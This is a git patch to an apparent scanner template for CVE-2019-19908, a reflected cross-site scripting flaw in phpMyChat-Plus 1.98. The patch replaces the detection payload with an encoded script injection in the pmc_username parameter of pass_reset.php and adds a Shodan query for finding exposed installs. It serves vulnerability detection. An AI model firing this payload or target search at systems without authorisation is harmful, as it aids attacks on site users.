From eebbc328fcfef247e606550e9d484bc687f51f03 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 26 Oct 2022 12:32:34 +0530
Subject: [PATCH] Fix FP CVE-2019-19908

---
 cves/2019/CVE-2019-19908.yaml | 25 ++++++++++++++++++-------
 1 file changed, 18 insertions(+), 7 deletions(-)

diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml
index 58f0f0bb2b..13279330d4 100644
--- a/cves/2019/CVE-2019-19908.yaml
+++ b/cves/2019/CVE-2019-19908.yaml
@@ -4,7 +4,8 @@ info:
   name: phpMyChat-Plus 1.98 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
+  description: |
+    phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
   reference:
     - https://cinzinga.github.io/CVE-2019-19908/
     - http://ciprianmp.com/
@@ -15,20 +16,30 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2019-19908
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,injection,javascript
+  metadata:
+    verified: true
+    shodan-query: inurl:"/plus/pass_reset.php"
+  tags: cve,cve2019,phpMyChat,xss
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
+      - "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
+
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - 'username = "</script><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "<script>alert(1337)</script>"
-        part: body
 
 # Enhanced by mp on 2022/08/31